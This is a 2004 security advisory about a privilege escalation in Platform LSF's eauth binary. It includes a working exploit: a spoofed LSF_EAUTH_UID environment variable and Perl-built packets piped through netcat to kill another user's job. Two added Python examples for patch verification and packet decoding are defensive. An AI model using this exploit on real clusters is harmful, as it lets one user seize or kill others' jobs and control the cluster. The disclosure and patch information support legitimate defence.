[UNIX] LSF Cluster Remote Privileges Escalation

From: SecuriTeam (support_at_securiteam.com)
Date: 02/26/04

    To: list@securiteam.com
    Date: 26 Feb 2004 11:57:54 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      LSF Cluster Remote Privileges Escalation
    ------------------------------------------------------------------------

    SUMMARY

    "eauth", the component of <http://www.platform.com/> LSF (Load Sharing
    Facility) that controls authentication, can be exploited to send commands
    to LSF on behalf of a different user. In this way a user can submit and
    control jobs on behalf of other users. The risk is confined to the "local
    cluster": it can be exploited remotely (from one host to another), but
    only between hosts within the same LSF cluster.

    DETAILS

    Vulnerable Systems:
     * Load Sharing Facility versions 4.x, 5.x, 6.x

    "eauth" has a very dangerous undocumented feature: during its execution it
    checks for the LSF_EAUTH_UID environment variable and, if the variable is
    set, uses its value instead of the real UID of the user who invoked the
    "eauth" binary. An attacker can therefore generate the authentication
    string of any user on the system and use it to control processes on
    behalf of other users in the cluster. Moreover, because the same
    authentication string is used for some administrative commands, the
    attacker is able to control the cluster itself.

    In order to take over another user's process, the attacker needs the
    authentication data for that user. In most cases only the "lsfadmin"
    authentication data is needed, because that user can control every other
    user's processes, but let's say she wants to steal a process from user
    "cadence".

    $ cat /etc/passwd | grep cadence
    cadence:x:500:500:Tomasz Grabowski:/home/cadence:/bin/bash
    $ export LSF_EAUTH_UID=500
    $ eauth -c hostname
    ,',0/%+-$%$&&,/)
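    The behaviour above doubles as a patch-verification test: run the same
    "eauth -c hostname" command as an unprivileged user with LSF_EAUTH_UID
    unset and then set to some other UID, and compare the two strings. The
    script below is an added example, not code from the advisory or from
    Platform. It assumes that a correct eauth returns the same string for the
    same caller and environment; if two baseline runs already differ (an eauth
    that mixes in a timestamp or nonce) the check reports itself as
    inconclusive rather than guessing. The demo() function runs the check
    against three constructed shell stubs standing in for an unpatched, a
    patched and a non-deterministic eauth, so it needs no real LSF install.

```python
#!/usr/bin/env python3
"""Post-patch check: does an 'eauth' binary honour LSF_EAUTH_UID?

Added verification example; not code from the advisory or from Platform.
It only runs the 'eauth -c hostname' command the advisory shows and
compares the returned authentication strings."""
import os
import stat
import subprocess
import tempfile


def run_eauth(binary, env_uid=None):
    """Run 'eauth -c hostname' with LSF_EAUTH_UID unset (baseline) or set to env_uid."""
    env = {k: v for k, v in os.environ.items() if k != "LSF_EAUTH_UID"}
    if env_uid is not None:
        env["LSF_EAUTH_UID"] = str(env_uid)
    proc = subprocess.run([binary, "-c", "hostname"], env=env,
                          capture_output=True, text=True, timeout=10)
    return proc.stdout.strip()


def eauth_honours_uid_env(binary, spoof_uid=None):
    """True  -> the auth string changes with LSF_EAUTH_UID (unpatched behaviour)
    False -> the variable is ignored (expected after the patch)
    None  -> two baseline runs already differ, so the comparison is inconclusive"""
    if spoof_uid is None:
        spoof_uid = os.getuid() + 1          # any UID that is not our own
    baseline = run_eauth(binary)
    if run_eauth(binary) != baseline:        # output not stable: cannot judge
        return None
    return run_eauth(binary, spoof_uid) != baseline


def _write_stub(directory, name, body):
    """Write a tiny executable shell script standing in for eauth (constructed)."""
    path = os.path.join(directory, name)
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\n" + body + "\n")
    os.chmod(path, stat.S_IRWXU)
    return path


def demo():
    """Exercise the check against three constructed stand-ins, not a real eauth."""
    with tempfile.TemporaryDirectory() as tmp:
        unpatched = _write_stub(tmp, "eauth-unpatched",
                                'echo "auth-for-uid-${LSF_EAUTH_UID:-$(id -u)}"')
        patched = _write_stub(tmp, "eauth-patched",
                              'echo "auth-for-uid-$(id -u)"')
        noisy = _write_stub(tmp, "eauth-noisy",
                            'echo "auth-$$"')   # PID changes on every run
        return {
            "unpatched": eauth_honours_uid_env(unpatched),
            "patched": eauth_honours_uid_env(patched),
            "noisy": eauth_honours_uid_env(noisy),
        }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

    Against a real cluster, call eauth_honours_uid_env() with the path of the
    replaced binary on each platform in the cluster; the advisory notes that
    the fix must be applied per platform, so one host passing says nothing
    about the others.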

    Exploit:
    Now, she needs to send packets. She can do it, for the sake of simplicity,
    using Perl and NetCat software:
    ( # first packet
    perl -e 'print "\x04\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00";
    print "\x00\x00\x00\x00";
    '
    sleep 1;

    # second packet; let's call it a header, packet length
    perl -e 'print "\x00\x04\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x40";
    # below we provide UID, GID and length of user name
    print "\x00\x00\x00\x00\x00\x00\x03\xee\x00\x00\x03\xee\x00\x00\x00\x07";
    # below is the user name, end indicator, and probably auth data field length
    print "\x63\x61\x64\x65\x6e\x63\x65\x00\x00\x00\x00\x03\x00\x00\x00\x10";
    # again authentication length and auth data itself
    print "\x00\x00\x00\x10\x2a\x30\x26\x24\x21\x25\x2e\x23\x2c\x23\x27\x2d";
    # rest of auth data, end indicator, question code (x09 - bkill) and process number
    print "\x2f\x28\x2b\x25\x00\x00\x00\x02\x00\x00\x00\x09\x00\x00\x00\x77";
    print "\x00\x00\x00\x00";
    '
    # send it to the target daemon
    ) | nc 192.168.10.106 6881

    After sending these two packets, she will kill process number 119
    belonging to user "cadence".
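    For anyone reviewing a capture of traffic to the LSF daemon port during
    incident response, the request above can be split back into the fields the
    advisory labels. The decoder below is an added example, not code from the
    advisory or from Platform; the field layout is taken from the comments in
    the packet dump and is an assumption wherever the advisory itself says
    "probably". The sample input is the second packet re-assembled from the
    hex dump, and the opcode table knows only the one value the advisory names
    (0x09, bkill); everything else is reported numerically.

```python
#!/usr/bin/env python3
"""Decode the LSF job-control request shown in the advisory.

Added example for packet-capture review; not code from the advisory or
from Platform. Field layout follows the advisory's own comments and is an
assumption where the advisory says 'probably'."""
import struct

# Opcode names known from the advisory only; others are reported as numbers.
OPCODES = {9: "bkill"}


def u32(data, off):
    """Big-endian 32-bit word at offset off."""
    return struct.unpack_from(">I", data, off)[0]


def parse_request(data):
    """Split the request into the fields the advisory labels (all words big-endian):
       0  12-byte header; its last word is what the advisory calls the packet length
      12  unknown word, UID, GID, user-name length
      28  user name (name-length bytes) followed by a NUL
      ..  end indicator, auth length, auth length again, auth data
      ..  end indicator, question code (opcode), job number, trailing word"""
    if len(data) < 28:
        raise ValueError("too short for a header and identity block")
    fields = {"pkt_len": u32(data, 8), "uid": u32(data, 16), "gid": u32(data, 20)}
    name_len = u32(data, 24)
    off = 28
    fields["user"] = data[off:off + name_len].decode("ascii")
    off += name_len + 1                       # skip the NUL after the name
    fields["end1"] = u32(data, off); off += 4
    fields["auth_len"] = u32(data, off); off += 4
    if u32(data, off) != fields["auth_len"]:  # the length is sent twice
        raise ValueError("auth length fields disagree")
    off += 4
    fields["auth"] = data[off:off + fields["auth_len"]]
    off += fields["auth_len"]
    fields["end2"] = u32(data, off); off += 4
    fields["opcode"] = u32(data, off); off += 4
    fields["job"] = u32(data, off); off += 4
    fields["trailer"] = u32(data, off)
    return fields


def describe(data, src_host="?"):
    """One audit line: which identity the request claims and what it asks for."""
    f = parse_request(data)
    op = OPCODES.get(f["opcode"], "opcode 0x%02x" % f["opcode"])
    return "%s: %s job %d as user '%s' (uid %d, gid %d)" % (
        src_host, op, f["job"], f["user"], f["uid"], f["gid"])


# Second packet from the advisory, re-assembled from its hex dump (constructed input).
SAMPLE = bytes.fromhex(
    "000400000d00000000000040"
    "00000000000003ee000003ee00000007"
    "636164656e6365000000000300000010"
    "000000102a30262421252e232c23272d"
    "2f282b25000000020000000900000077"
    "00000000"
)

if __name__ == "__main__":
    print(describe(SAMPLE, "hostA"))   # hostA is a constructed source name
```

    Decoding the dump also makes one detail visible that the prose glosses
    over: the packet claims UID 0x3ee (1006), not the 500 listed for "cadence"
    in /etc/passwd above. The request carries the identity it wants to act as,
    and the authentication string is the only thing binding that identity to
    the sender, which is why a forged eauth string is all the attacker needs.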

    How to patch:
    This problem has been directly addressed in a security patch released for
    LSF. The fix is confined to the "eauth" binary, which needs to be
    replaced for each platform used in the cluster. The patch can be
    downloaded from Platform's FTP site.

    FTP: ftp.platform.com
    Path: patches/<version>/os/<os>/eauth*
    Example: patches/5.1/os/sparc-sol7-64/eauth5.1_sparc-sol7-64.Z

    If the OS or version is not currently available, it can be built on
    demand. Please contact Platform Technical Support if you have any
    questions or concerns. Phone: 1-877-444-4573 or Email:
    support@platform.com

    References:
    This bug was confirmed in Platform's official security advisory dated 9
    Feb 2004. It is accessible directly from Platform as Knowledge Base
    Article KB1-5T4XV.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:cadence@aci.com.pl> Tomasz
    Grabowski.


